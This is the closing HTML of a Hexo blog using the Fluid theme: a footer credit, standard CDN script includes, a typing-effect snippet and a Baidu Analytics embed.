     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?ee9387c15cc7097331ccc74141d07081";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
